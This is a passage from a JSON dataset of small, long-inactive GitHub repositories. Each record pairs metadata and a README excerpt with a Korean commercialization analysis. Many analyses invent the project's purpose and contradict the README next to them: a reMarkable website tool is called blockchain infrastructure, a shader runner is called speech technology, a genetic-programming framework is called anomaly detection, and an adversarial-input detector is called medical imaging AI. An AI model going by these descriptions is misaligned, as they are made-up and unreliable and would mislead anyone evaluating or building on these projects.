lib","composite_score":0.5002,"license_safety_tag":"safe"},{"name":"jackmott/rust-lexer","github_url":"https://github.com/jackmott/rust-lexer","stars":6,"language":"Rust","license":"MIT","abandonment_months":79,"description":"# rust-lexer 프로젝트 분석\n\n## 왜 보물인가\n프로그래밍 언어나 데이터 형식을 컴퓨터가 이해할 수 있도록 변환해주는 기초 도구로, 수많은 개발 소프트웨어의 핵심 부품이 될 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **코드 분석 SaaS**: 프로그래밍 코드의 품질을 자동으로 검사하고 보고서를 제공하는 웹 서비스\n2. **내부 업무 도구**:","readme_excerpt":"# A port of Rob Pike's Go lexer to Rust\n\nRob Pike has an excellent video showing how to write a nice lexical scanner in golang: https://www.youtube.com/watch?v=HxaD_trXwRE\nThis is a port of that approach to Rust. This is just a sample binary you can play with, not meant as a general purpose library. \nThe lexer sends tokens on a channel so that a parser could consume them from a separate thread.  No string allocations are made, \ntokens refer to slices of the original input string.\n\n\n","composite_score":0.5002,"license_safety_tag":"safe"},{"name":"dromara/shenyu","github_url":"https://github.com/dromara/shenyu","stars":12,"language":"","license":"Apache-2.0","abandonment_months":37,"description":"# ShenYu 저장소 분석 보고서\n\n## 왜 보물인가\n인터넷 서비스 여러 개를 하나처럼 관리해주는 '교통정리 시스템'으로, 회사의 API 서비스 관리를 쉽게 만들어줍니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 클라우드 기반 업무 플랫폼에서 고객별로 다른 기능을 제공할 때 이용\n- **내부 업무 도구**: 회사 내 여러 부서의 시스템(인사","readme_excerpt":"![Light Logo](https://raw.githubusercontent.com/apache/shenyu-website/main/static/img/logo-light.svg#gh-dark-mode-only)\n![Dark Logo](https://raw.githubusercontent.com/apache/shenyu-website/main/static/img/logo.svg#gh-light-mode-only)\n\n<p align=\"center\">\n  <strong>Scalable, High Performance, Responsive API Gateway Solution for all MicroServices</strong>\n</p>\n<p align=\"center\">\n  <a href=\"https://shenyu.apache.org/\">https://shenyu.apache.org/</a>\n</p>\n\n<p align=\"center\">\n  <a href=\"https://shenyu.apache.org/docs/index\" >\n    <img src=\"https://img.shields.io/badge/document-English-blue.svg\" alt=\"EN docs\" />\n  </a>\n  <a href=\"https://shenyu.apache.org/zh/docs/index\">\n    <img src=\"https://img.shields.io/badge/文档-简体中文-blue.svg\" alt=\"简体中文文档\" />\n  </a>\n</p>\n\n<p align=\"center\">\n    <a target=\"_blank\" href=\"https://search.maven.org/search?q=g:org.apache.shenyu%20AND%20a:shenyu\">\n        <img src=\"https://img.shields.io/maven-central/v/org.apache.shenyu/shenyu.svg?label=maven%20central\" />\n    <","composite_score":0.5002,"license_safety_tag":"safe"},{"name":"pengwk/touch-callable","github_url":"https://github.com/pengwk/touch-callable","stars":6,"language":"JavaScript","license":"MIT","abandonment_months":41,"description":"# touch-callable 프로젝트 분석\n\n## 왜 보물인가\n스마트폰 터치 화면에서 특정 버튼을 눌렀을 때 자동으로 연결된 프로그램이 실행되도록 만드는 기술로, 앱 개발자들이 사용자 경험을 간편하게 개선할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 모바일 앱 개발 플랫폼에서 터치 감지 기능을 내장 서비스로 제공\n- **내부 업","readme_excerpt":"<p align=\"center\">\n  <img width=\"200\" src=\"./touch-callable.svg\">\n</p>\n\n<h1 align=\"center\">Touch-Callable</h1>\n<p align=\"center\">\n  <image src=\"https://img.shields.io/pypi/v/touch-callable.svg\" />\n  <image src=\"https://img.shields.io/pypi/dm/touch-callable.svg\" />\n</p>\n\n<p>\nThe web framework for less serious application.\n\nAutomatically generate a Web UI for Python function using type annotations.\n<p>\n\nEnglish | [简体中文](./README_zh_CN.md)\n\n## Support platforms\n\n- macOS\n- Ubuntu\n- Windows\n\n## Installation\n\nOnly support Python 3.6!\n\n`pip install -U touch-callable`\n\n## Supported parameter value types\n\n- str\n- int\n- float\n- bool\n- datetime.datetime\n- datetime.date\n- datetime.time\n- enum.Enum\n- io.BytesIO\n- typing.BinaryIO\n\n## Supported return value types\n\n- All objects that can be `json.dumps`\n- `open('filename.xxx', 'rb')`, return values' annotation should be `io.BufferedReader`\n\n## CommandLine args\n\n#### `--host` \n\nDefault is 127.0.0.1, you can only visit it on your computer.\n\nIf you want ","composite_score":0.5002,"license_safety_tag":"safe"},{"name":"loklak/loklak_3d","github_url":"https://github.com/loklak/loklak_3d","stars":12,"language":"","license":"MIT","abandonment_months":126,"description":"# loklak_3d 프로젝트 평가\n\n## 왜 보물인가\n트위터 같은 소셜 미디어의 대량 데이터를 3D 시각화로 보여주는 독특한 도구로, 복잡한 정보를 직관적으로 이해할 수 있게 합니다.\n\n## 어디에 쓸 수 있나\n1. **소셜 미디어 분석 서비스**: 마케팅팀이 구독해서 트렌드 변화를 3D로 시각화하여 보고서 작성\n2. **뉴스 모니터링 플랫폼**: 언론사","readme_excerpt":"# loklak_3d\nloklak in 3d for print out\n\n## File Naming Suggestion:\n- If you add a new design, add a ```i0``` to the file name ('iteration 0'), followed with your nickname.\n- If you enhance an existing design, use the same file name, replace the author nickname with your own and increase the iteration count (i.e. for the first enhancement: ```i1```)\n","composite_score":0.5002,"license_safety_tag":"safe"},{"name":"git-things-done/template","github_url":"https://github.com/git-things-done/template","stars":8,"language":"","license":"unknown","abandonment_months":52,"description":"# git-things-done/template 분석\n\n## 왜 보물인가\n할 일 관리를 위한 기본 틀을 제공하는 오픈소스 템플릿으로, 누구나 자신의 일정 관리 시스템을 쉽게 구축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 팀 협업 할 일 관리 앱으로 발전시켜 회사원들이 프로젝트를 함께 진행하도록 제공\n- **내부 업무 도구**:","readme_excerpt":"# Git Things Done (GitTD)\n\nEvery few years I hunt around for a habit-tracker that meets my needs.\n\nAnd for *maybe a week*: my needs are met.\n\nIt’s not long however before I want to *track tasks*, add *journal entries*; add\n*tags*, *images* and *notes*; I want to *set deadlines*; *make API calls* and\nsynchronize with other tools on the web. The apps are never flexible enough;\nso I give up.\n\nThis year it occurred to me that I could build what I needed using\nGitHub *Issues*, GitHub *Actions*, GitHub *Pages* and GitHub *Flat Data*.\nGit Things Done is a **programmable**, **flexible**, **hackable** and **extensible**\n“Getting Things Done” system. Try it out and make it yours.\n\n![Screenshot](https://user-images.githubusercontent.com/58962/142735824-d0fae666-5581-44d3-aaa8-ead40e0df4d4.png)\n\n\n### 🚨 WARNING! 🚨\n\nThis is new software and definitely not mature!\nError handling is bad!\nYou may have to help fix things!\n\n## How It Works\n\nEvery morning [the porter][] creates a new ticket for the day fr","composite_score":0.5002,"license_safety_tag":"unknown"},{"name":"ElectronicBlueberry/Texture-Fonts","github_url":"https://github.com/ElectronicBlueberry/Texture-Fonts","stars":5,"language":"GDScript","license":"MIT","abandonment_months":55,"description":"# Texture-Fonts 저장소 분석\n\n## 왜 보물인가\n게임이나 앱의 글씨를 예쁘고 독특하게 만들어주는 디자인 도구 모음입니다.\n\n## 어디에 쓸 수 있나\n1. **게임 개발 SaaS**: 인디 게임 개발자들이 구독으로 다양한 폰트 리소스에 접근하는 서비스\n2. **모바일 앱 개발 도구**: 앱 디자이너들이 텍스트 효과를 쉽게 적용할 수 있는 웹 기반","readme_excerpt":"# Texture-Fonts\n\nTexture Fonts is a Plugin for Godot 3.4+ that allows for easy creation of custom Fonts directly inside of Godot.\nSimply load a texture, specify some parameters, and the plugin will generate all necessary font-data.\n\nThe Plugin adds a new custom Resource \"TextureFont\", and a Font Editor to edit the Fonts.\n\nCreate hand-drawn or pixel art Fonts directly inside of Godot, or add custom emoji to existing fonts.\n\n## Usage\n\nDownload the addon, enable it, and create a new Resource with the type \"TextureFont\". Add a Texture to get started.\n\nCheck out the examples included in this repository to see what's possible when creating your own Fonts.\n\nFor guides and a complete documentation, see the [Wiki](https://github.com/ElectronicBlueberry/Texture-Fonts/wiki)\n","composite_score":0.5002,"license_safety_tag":"safe"},{"name":"ruby/rbs_json_schema","github_url":"https://github.com/ruby/rbs_json_schema","stars":5,"language":"Ruby","license":"MIT","abandonment_months":47,"description":"# ruby/rbs_json_schema 분석 보고서\n\n## 왜 보물인가\n데이터 형식을 자동으로 검증하는 기술로, 서버와 클라이언트 간 정보 주고받을 때 오류를 사전에 방지합니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**\n- 사용자가 입력한 정보의 정확성을 자동으로 확인하는 회원가입·결제 시스템에 탑재\n\n**2. 내부 업무 도구**\n- 회사","readme_excerpt":"# rbs_json_schema\n\nrbs_json_schema is a RBS type definition generator from JSON Schema.\nIt loads JSON files and writes RBS type definitioins.\n\n## Installation\n\nAdd this line to your application's Gemfile:\n\n```ruby\ngem 'rbs_json_schema'\n```\n\nAnd then execute:\n\n    $ bundle install\n\nOr install it yourself as:\n\n    $ gem install rbs_json_schema\n\n## Usage\n\nExecute `rbs_json_schema` command with JSON schema files.\n\n```\n$ bundle exec rbs_json_schema schemas/address.json\n```\n\n## Development\n\nAfter checking out the repo, run `bin/setup` to install dependencies. Then, run `rake test` to run the tests. You can also run `bin/console` for an interactive prompt that will allow you to experiment.\n\nTo install this gem onto your local machine, run `bundle exec rake install`. To release a new version, update the version number in `version.rb`, and then run `bundle exec rake release`, which will create a git tag for the version, push git commits and tags, and push the `.gem` file to [rubygems.org](https","composite_score":0.5002,"license_safety_tag":"safe"},{"name":"merantix/mxlabs-daain","github_url":"https://github.com/merantix/mxlabs-daain","stars":10,"language":"Python","license":"Apache-2.0","abandonment_months":61,"description":"# merantix/mxlabs-daain 분석 보고서\n\n## 왜 보물인가\n인공지능이 의료 영상(X-ray, CT 스캔 등)을 자동으로 분석하여 의사의 진단을 빠르고 정확하게 돕는 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **병원 진단 지원 SaaS**: 의료 기관이 월 구독으로 영상 분석 시스템을 클라우드로 이용\n2. **보험사 내부 도구**: 보험금","readme_excerpt":"# Merantix-Labs: DAAIN\n\nThis is the code for our paper **DAAIN: Detection of Anomalous and Adversarial Input using Normalizing Flows** which can be found at [arxiv](http://arxiv.org/abs/2105.14638).\n\n## Assumptions\n\nThere are assumptions:\n\n- The training data PerturbedDataset makes some assumptions about the data:\n    - the `ignore_index` is 255\n    - `num_classes` = 19\n    - the images are resized with `size == 512`\n\n## Module Overview\n\nA selection of the files with some pointers what to find where\n\n```\n├── configs                                   # The yaml configs\n│   ├── activation_spaces\n│   │   └── esp_net_256_512.yaml\n│   ├── backbone\n│   │   ├── esp_dropout.yaml\n│   │   └── esp_net.yaml\n│   ├── dataset_paths\n│   │   ├── bdd100k.yaml\n│   │   └── cityscapes.yaml\n│   ├── data_creation.yaml                    # Used to create the training and testing data in one go\n│   ├── detection_inference.yaml              # Used for inference\n│   ├── detection_training.yaml               # Us","composite_score":0.5002,"license_safety_tag":"safe"},{"name":"sw-yx/alumni-startups","github_url":"https://github.com/sw-yx/alumni-startups","stars":8,"language":"","license":"MIT","abandonment_months":35,"description":"# alumni-startups 상용화 분석\n\n## 왜 보물인가\n대학 동문 네트워크를 체계적으로 관리하고 창업 기업들을 연결해주는 플랫폼으로, 학교와 졸업생 모두에게 지속적인 가치를 제공할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **대학 동문 관리 SaaS**: 대학교가 월 구독으로 동문들의 경력 정보, 창업 현황, 네트워킹 기회를 한곳에서 관리하","readme_excerpt":"# alumni-startups\n\npersonal list of dev tool startups by alums of bigname startups. trying to form a thesis about how alumni startups form/cluster and what they are good at.\n\n## Uber\n\n- Temporal (Workflow engine): https://temporal.io\n- Chronosphere (O11y platform): https://chronosphere.io/ \n- Tecton.ai: (ML feature store - Michelangelo)\n  - https://techcrunch.com/2020/04/28/tecton-ai-emerges-from-stealth-with-20m-series-a-to-build-operational-machine-learning-platform/\n  - https://a16z.com/2020/04/28/investing-in-tecton/\n- Predibase (Uber Ludwig): https://twitter.com/w4nderlus7/status/1524790428100272145\n- https://medium.com/predibase/introducing-predibase-the-enterprise-declarative-machine-learning-platform-10e2a388d465\n- Trunk (linting): https://trunk.io/\n- Mobile.dev (Mobile dev platform) https://www.mobile.dev/\n\nhttps://twitter.com/dharosaurus/status/1502048592130945024?s=21\n\n## Lyft\n\n- RideOS (cloud for autonomous vehicles): https://angel.co/company/rideos\n- Stemma (Amundsen - dat","composite_score":0.5002,"license_safety_tag":"safe"},{"name":"Omar-Belghaouti/react-help-create","github_url":"https://github.com/Omar-Belghaouti/react-help-create","stars":6,"language":"JavaScript","license":"MIT","abandonment_months":32,"description":"# react-help-create 저장소 분석\n\n## 왜 보물인가\n웹사이트를 만들 때 사용자가 도움말을 쉽게 추가할 수 있는 도구로, 비개발자도 사용자 안내 기능을 간단하게 구현할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 신입 사용자를 위한 제품 투어(첫 사용 안내) 기능을 빠르게 추가하여 이탈률 감소\n- **내부 업무 도구*","readme_excerpt":"<p align=\"center\">\n  <img src=\"https://user-images.githubusercontent.com/48713070/130338182-bfd64ba3-bdd0-4384-8560-c0c0021a8d02.png\" width=\"350\" height=\"350\" alt=\"react-help-create\"/>\n</p>\n<h1 align=\"center\">react-help-create</h1>\n\n<p align=\"center\">Focus on your code, not your project structure!</p>\n\n<p align=\"center\">This command line helps you create components, pages and even redux implementation for your react project.</p>\n\n<p align=\"center\">\n  <a href=\"https://github.com/Omar-Belghaouti/react-help-create/blob/main/LICENSE\">\n    <img src=\"https://img.shields.io/badge/license-MIT-blue.svg\" alt=\"react-help-create is released under the MIT license.\" />\n  </a>\n  <a href=\"https://www.npmjs.com/package/react-help-create\">\n    <img src=\"https://img.shields.io/npm/v/react-help-create?color=e80441&label=react-help-create\" alt=\"Current npm package version.\" />\n  </a>\n  <a href=\"https://github.com/Omar-Belghaouti/react-help-create/blob/main/CONTRIBUTING.md\">\n    <img src=\"https://img.shield","composite_score":0.5002,"license_safety_tag":"safe"},{"name":"davidrusu/marker.network","github_url":"https://github.com/davidrusu/marker.network","stars":9,"language":"TypeScript","license":"unknown","abandonment_months":55,"description":"# Marker Network 상용화 분석\n\n## 왜 보물인가\n블록체인 기술을 활용해 여러 네트워크를 연결하고 자산을 추적하는 기반 기술로, 미래의 암호화폐 및 금융 인프라 구축에 핵심적인 역할을 할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 암호화폐 거래소들이 서로 다른 블록체인 네트워크의 자산을 통합 관리할 수 있는 관리 플랫","readme_excerpt":"<a href=\"https://marker.network\"><img src=\"https://user-images.githubusercontent.com/1832378/142739772-34011e39-4d73-4aa8-a9ba-090261bef67b.png\" width=64px /></a>\n\n# Marker Network\n\nDesign and publish a website from your reMarkable Tablet.\n\n\nhttps://user-images.githubusercontent.com/1832378/142739832-aff24232-a114-4bfd-ae07-7d651a6c0b88.mp4\n\n\n# Support\n<a href=\"https://www.buymeacoffee.com/davidrusu\" target=\"_blank\"><img src=\"https://cdn.buymeacoffee.com/buttons/v2/default-yellow.png\" alt=\"Buy Me A Coffee\" style=\"height: 60px !important;width: 217px !important;\" ></a>\n\nBuy me a coffee to help offset marker.network's server bills and fund future feature development!\n\n## Setting up for development\n\nInstall [rustup](https://rustup.rs/)\n\n```bash\ngit clone https://github.com/davidrusu/marker.network\ngit submodule update --init marker-network-site-generator/\n\n# on linux\nrustup target install x86_64-unknown-linux-musl\n# on ubuntu\nsudo apt-get install musl-tools\n\nnpm install\nnpm run build\n```\n","composite_score":0.5002,"license_safety_tag":"unknown"},{"name":"tfausak/hlint-action","github_url":"https://github.com/tfausak/hlint-action","stars":10,"language":"JavaScript","license":"MIT","abandonment_months":46,"description":"# hlint-action 상용화 분석\n\n## 왜 보물인가\n프로그래머들이 작성한 코드의 오류를 자동으로 찾아주는 검사 도구로, 소프트웨어 품질 관리에 필수적인 솔루션입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 중소 소프트웨어 회사가 구독하여 자동 코드 품질 검사 플랫폼으로 제공\n2. **내부 업무 도구**: 대형 개발팀이 자체 서버에 ","readme_excerpt":"# HLint action\n\n:warning:\nThis action is not maintained anymore.\nYou should use [haskell/actions/hlint-run](https://github.com/haskell/actions/tree/main/hlint-run) instead.\n\nThis is a GitHub Action that checks to make sure that Haskell files are\nproperly linted with [HLint][].\n\n[HLint]: https://hackage.haskell.org/package/hlint\n\n## Example\n\n``` yaml\non: push\njobs:\n  hlint:\n    runs-on: ubuntu-latest\n    steps:\n      - uses: actions/checkout@v2\n      - uses: tfausak/hlint-action@v1\n```\n\n## Options\n\n- `config`: Optional. Defaults to `.hlint.yaml`. The HLint config file to use.\n  If this file does not exist, no error will be thrown.\n\n- `pattern`: Optional. Defaults to `**/*.hs`. The Haskell files to lint. If no\n  files are found, the action will succeed.\n\n- `version`: Optional. Defaults to `latest`. The version of HLint to use.\n  Supports these versions: <https://github.com/ndmitchell/hlint/releases>.\n","composite_score":0.5002,"license_safety_tag":"safe"},{"name":"Polygon-Analytics/Resources","github_url":"https://github.com/Polygon-Analytics/Resources","stars":6,"language":"","license":"unknown","abandonment_months":40,"description":"# Polygon-Analytics/Resources 분석 보고서\n\n## 왜 보물인가\n블록체인 플랫폼 폴리곤의 데이터를 분석하고 활용할 수 있는 자료 모음으로, 암호화폐 투자자와 기업이 시장 동향을 빠르게 파악하는 데 도움이 됩니다.\n\n## 어디에 쓸 수 있나\n**1. 암호화폐 분석 SaaS 서비스**: 투자자용 대시보드에 폴리곤 네트워크 통계를 실시간 제","readme_excerpt":"<br/>\n<p align=\"center\">\n    <a href=\"https://polygon.technology\" target=\"_blank\">\n        <img height=\"120px\" src=\"https://github.com/Polygon-Analytics/Resources/blob/main/Assets/logo.png?raw=true\" alt=\"Polygon Logo\">\n    </a>\n</p>\n\n<br/>\n<p align=\"center\">\n    <a href=\"https://GitHub.com/Polygon-Analytics/Resources/graphs/commit-activity\" target=\"_blank\">\n        <img src=\"https://img.shields.io/badge/Maintained%3F-yes-green.svg\" alt=\"#analytics on Discord\">\n    </a>\n    <a href=\"LICENSE\" target=\"_blank\">\n        <img src=\"https://img.shields.io/github/license/Polygon-Analytics/Resources.svg\" alt=\"GitHub license\">\n    </a>\n    <a href=\"https://github.com/Polygon-Analytics/Resources/commits/2.x\" target=\"_blank\">\n        <img src=\"https://img.shields.io/github/commit-activity/y/Polygon-Analytics/Resources.svg\" alt=\"GitHub commit activity\">\n    </a>\n    <a href=\"https://github.com/Polygon-Analytics/Resources/graphs/contributors\" target=\"_blank\">\n        <img src=\"https://img.shields.io/","composite_score":0.5002,"license_safety_tag":"unknown"},{"name":"mentalfaculty/Anomalii","github_url":"https://github.com/mentalfaculty/Anomalii","stars":7,"language":"Swift","license":"MIT","abandonment_months":103,"description":"# Anomalii 저장소 분석\n\n## 왜 보물인가\n비정상 데이터를 자동으로 찾아내는 기술로, 기업의 숨겨진 문제나 사기를 조기에 발견할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **금융사 구독 서비스**: 은행·증권사가 고객 거래 패턴의 이상을 감지하는 SaaS로 판매\n2. **제조업 내부 도구**: 공장 생산 라인의 불량품을 자동으로 찾아내는 품질","readme_excerpt":"# Anomalii\n\n_Author:_ Drew McCormack<br>\n_Last Updated:_ 1 December, 2017\n\nAn exploratory Swift framework for Genetic Programming.\n\n## What is Genetic Programming?\n\nA branch of machine learning in which simple programs or mathematical functions compete to solve a problem, evolving along the lines of Darwinian evolution. A population of solutions can cross pollinate and mutate, and so evolve through generations to 'fitter' descendants. \n\nFor a detailed overview, see [A Field Guide to Genetic Programming](http://www.gp-field-guide.org.uk).\n\n## What Works?\n\n- Simple scalar mathematical expressions, comprised of basic operators like addition and multiplication, decimal constants, and variables\n- Mathematical expressions are trees of value types (structs)\n- The basic elements of the Genetic Programming (GP), namely initial population generation, evolutionary operators including crossover and mutation\n- Storing of populations and expressions using the Swift `Codable` protocol\n- Basic unit te","composite_score":0.5002,"license_safety_tag":"safe"},{"name":"vashll/workingcell","github_url":"https://github.com/vashll/workingcell","stars":9,"language":"Go","license":"unknown","abandonment_months":60,"description":"# workingcell 프로젝트 분석\n\n## 왜 보물인가\n정확한 설명 자료가 부족하고 마지막 업데이트가 2021년이라 현재 프로젝트의 목적과 가치를 판단하기 어렵습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 데이터 분석이나 스프레드시트 기반 협업 도구로 제공 (프로젝트 특성이 명확하지 않아 추정)\n- **내부 업무 도구**: 회사 내부의","readme_excerpt":"\n","composite_score":0.5002,"license_safety_tag":"unknown"},{"name":"fsouza/autoflake8","github_url":"https://github.com/fsouza/autoflake8","stars":6,"language":"Python","license":"MIT","abandonment_months":34,"description":"# fsouza/autoflake8 분석 보고서\n\n## 왜 보물인가\n프로그래머가 작성한 코드에서 불필요한 부분을 자동으로 정리해주는 도구로, 수작업으로 하던 코드 정리 작업을 자동화할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 웹 기반 코드 정리 플랫폼으로, 프로그래머들이 업로드한 코드를 자동으로 개선해주고 결과를 보여주는 서","readme_excerpt":"# Please move back to autoflake\n\nautoflake is maintained now, check it out: https://github.com/PyCQA/autoflake\n","composite_score":0.5002,"license_safety_tag":"safe"},{"name":"Gui-Yom/nuance","github_url":"https://github.com/Gui-Yom/nuance","stars":10,"language":"Rust","license":"Apache-2.0","abandonment_months":51,"description":"# Gui-Yom/nuance 프로젝트 분석\n\n## 왜 보물인가\n음성이나 텍스트를 더 자연스럽게 이해하고 처리할 수 있는 기술로, 챗봇이나 음성 서비스의 품질을 크게 향상시킬 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **고객센터 챗봇 SaaS**: 기업들이 구독하는 자동 상담 시스템에 탑재하여 월별 사용량에 따라 요금 부과\n2. **회사 내부 검색 ","readme_excerpt":"# Nuance\n\n![Crates.io](https://img.shields.io/crates/v/nuance)\n![Crates.io](https://img.shields.io/crates/l/nuance)\n\nA tool to run your shaders on the gpu.\n\n![screenshot](screenshot.png)\n*Loaded with example shader : `shaders/demo/foamy_water.frag` Made by k-mouse (\n2016-11-23) https://www.shadertoy.com/view/llcXW7*\n\n## Installation\n\nInstall with cargo:\n\n```shell\n$ cargo install --locked nuance\n```\n\nSee [Development](#Development) when building from source.\n\nOr download a prebuilt binary from the [Release](https://github.com/Gui-Yom/nuance/releases) page.\nPrebuilt binaries are currently available for Windows (x86_64-pc-windows-msvc) and Linux\n(x86_64-unknown-linux-gnu).\n\n## Usage\n\nRun it as is or `nuance -H` to force using the best gpu on your machine. By default, nuance selects\nthe less power-hungry gpu.\n\n## Shaders\n\nNuance allows you tu run a custom fragment shader. You can also use a shader already compiled to\nSpirV directly given it was compiled with the Nuance header.\n\nSee the com","composite_score":0.5002,"license_safety_tag":"safe"},{"name":"varunpm1/VPCollectionViewLayout","github_url":"https://github.com/varunpm1/VPCollectionViewLayout","stars":5,"language":"Swift","license":"MIT","abandonment_months":103,"description":"# VPCollectionViewLayout 분석 보고서\n\n## 왜 보물인가\n스마트폰 앱에서 사진이나 상품을 아름답게 배열해 보여주는 레이아웃 기술로, 앱 개발사들이 직접 만들기 어려운 부분을 쉽게 해결할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **이미지 공유 앱 서비스**: 인스타그램 같은 사진 앱에서 피드를 예쁘게 배열하는 기능 제공\n2. **전","readme_excerpt":"# VPCollectionViewLayout\n\nVPCollectionViewLayout is a helper class for displaying collection view cells in different flow layouts. The UI can be customized in different ways. See `Usage` for more info.\n\n## Requirements\n\n1. iOS 9.0 or later.\n2. ARC memory management.\n\n## Usage\n\nDrag and drop the folder `VPCollectionViewLayout` into your project. Add a collection view wherever needed in your xib or storyboard and change the flow layout class to custom and enter the name of the class as `VPCollectionViewLayout`.\n\nThe currently supported layouts are - vertical, horizontal, centralizedVertical, centralizedHorizontal and circular (more detail explanation mentioned within the class).\n\n\n# ![Screenshot](/Vertical.png)\n# ![Screenshot](/Horizontal.png)\n# ![Screenshot](/CentralizedVertical.png)\n# ![Screenshot](/CentralizedHorizontal.png)\n# ![Screenshot](/VerticalSelected.png)\n# ![Screenshot](/Circular.png)\n\n## Contributing\n**Type - 1**\n\n1. Fork it!\n2. Create your feature branch: `git checkout -b m","composite_score":0.5002,"license_safety_tag":"safe"},{"name":"shsf0817/hdr-nerf","github_url":"https://github.com/shsf0817/hdr-nerf","stars":6,"language":"JavaScript","license":"MIT","abandonment_months":35,"description":"# hdr-nerf 저장소 분석\n\n## 왜 보물인가\n어두운 사진과 밝은 사진을 동시에 잘 표현하는 고급 사진 처리 기술로, 전문 사진가들이 원하던 자동 보정 기능을 제공합니다.\n\n## 어디에 쓸 수 있나\n1. **사진 편집 SaaS**: 일반인도 쉽게 사용하는 모바일 사진 앱에 '자동 밝기 조정' 기능으로 통합\n2. **영화/방송 제작 도구**: 영화사의 ","readme_excerpt":"# [React](https://reactjs.org/) &middot; [![GitHub license](https://img.shields.io/badge/license-MIT-blue.svg)](https://github.com/facebook/react/blob/main/LICENSE) [![npm version](https://img.shields.io/npm/v/react.svg?style=flat)](https://www.npmjs.com/package/react) [![CircleCI Status](https://circleci.com/gh/facebook/react.svg?style=shield)](https://circleci.com/gh/facebook/react) [![PRs Welcome](https://img.shields.io/badge/PRs-welcome-brightgreen.svg)](https://reactjs.org/docs/how-to-contribute.html#your-first-pull-request)\n\nReact is a JavaScript library for building user interfaces.\n\n* **Declarative:** React makes it painless to create interactive UIs. Design simple views for each state in your application, and React will efficiently update and render just the right components when your data changes. Declarative views make your code more predictable, simpler to understand, and easier to debug.\n* **Component-Based:** Build encapsulated components that manage their own state, then","composite_score":0.5002,"license_safety_tag":"safe"},{"name":"HMNBadBoyz/ImForms","github_url":"https://github.com/HMNBadBoyz/ImForms","stars":7,"language":"C#","license":"MIT","abandonment_months":27,"description":"# ImForms 저장소 평가\n\n## 왜 보물인가\n누구나 쉽게 온라인 설문지나 신청 양식을 만들 수 있도록 돕는 도구로, 기업과 개인이 고객 정보를 간단히 수집할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: \"설문 조사 플랫폼\"으로 운영하여 기업들이 월 구독료를 내고 양식을 만들게 함\n2. **내부 업무 도구**: 회사의 HR팀이","readme_excerpt":"# ImForms\nImForms is an experiment in creating a wrapper class that allows you to create and get input from Windows Forms control, but in an fashion similar to Immediate Mode GUI systems such as [Dear ImGui](https://github.com/ocornut/imgui). It is compatible with existing WinForms projects, you need only provide the `ImFormsMgr` constructor with a Panel in which to place its controls.\n\n[![https://gyazo.com/c7c63b0968575e34d28b0431af08f92e](https://i.gyazo.com/c7c63b0968575e34d28b0431af08f92e.gif)](https://gyazo.com/c7c63b0968575e34d28b0431af08f92e)\n\nImForms could someday become a minimal-dependency tool that can easily be integrated into an existing Windows Forms (.NET 4.5+) project, and allows developers to create GUIs with minimal work.\n\nThe class is in ImForms.cs. It's simple to use. Just follow the example project (ImFormsUser.\\*.cs). The biggest gotcha is that you get the best performance if you assign every control a unique string identifier. The function `CompileTime.ID()` make","composite_score":0.5002,"license_safety_tag":"safe"},{"name":"hicops/hicops","github_url":"https://github.com/hicops/hicops","stars":6,"language":"C++","license":"NOASSERTION","abandonment_months":39,"description":"# hicops/hicops 저장소 분석\n\n## 왜 보물인가\n정확한 설명 문서가 없어 이 프로젝트의 실제 가치를 파악하기 어렵지만, GitHub Stars가 6개에 불과하고 2023년 이후 업데이트가 없어 현재 활발한 개발 프로젝트로 보기 어렵습니다.\n\n## 어디에 쓸 수 있나\n저장소 설명이 없어 구체적인 용도를 판단할 수 없으나, 프로젝트명과 구조를 분석","readme_excerpt":"![build](https://github.com/hicops/hicops/workflows/build/badge.svg) [![contributions welcome](https://img.shields.io/badge/contributions-welcome-brightgreen.svg?style=flat)](https://github.com/hicops/hicops/blob/develop/README.md#contributing) [![pages yes](https://img.shields.io/badge/pages-yes-blue.svg)](https://hicops.github.io) [![GitHub forks](https://img.shields.io/github/forks/hicops/hicops.svg?style=social&label=Fork&maxAge=2592000)](https://GitHub.com/hicops/hicops/network/) [![GitHub stars](https://img.shields.io/github/stars/hicops/hicops.svg?style=social&label=Star&maxAge=2592000)](https://GitHub.com/hicops/hicops/stargazers/) [![GitHub contributors](https://img.shields.io/github/contributors/hicops/hicops.svg)](https://GitHub.com/hicops/hicops/graphs/contributors/) [![GitHub issues](https://img.shields.io/github/issues/hicops/hicops.svg)](https://GitHub.com/hicops/hicops/issues/) [![Github all releases](https://img.shields.io/github/downloads/hicops/hicops/total.svg)](htt","composite_score":0.5002,"license_safety_tag":"unknown"},{"name":"jasonjin220/es6-express-rest-api-boilerplate","github_url":"https://github.com/jasonjin220/es6-express-rest-api-boilerplate","stars":6,"language":"JavaScript","license":"unknown","abandonment_months":58,"description":"# es6-express-rest-api-boilerplate 분석\n\n## 왜 보물인가\n웹 서비스를 빠르게 만들기 위한 '반제품' 같은 것으로, 개발자가 처음부터 모든 것을 짜지 않고도 데이터를 주고받는 웹 서버를 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 처음 웹 애플리케이션을 개발하는 스타트업이 초기 백엔드 서버로 활용하","readme_excerpt":"# Node/Express/Mongoose REST API Boilerplate supporting ES6 module\n\nBuild a Restful CRUD API for a simple Note-Taking application using Node.js, Express and MongoDB.\n\n## Requirements\n\n- [Node and npm](http://nodejs.org)\n- MongoDB: Make sure you have your own local or remote MongoDB database URI configured in `config/db.config.json`\n\n## Steps to Setup\n\nClone the repository:\n```sh\ngit clone git@github.com:jasonjin220/es6-express-rest-api-boilerplate.git\n```\n\nSet environment (vars):\n```sh\ncp .env.example .env\n```\n\nInstall 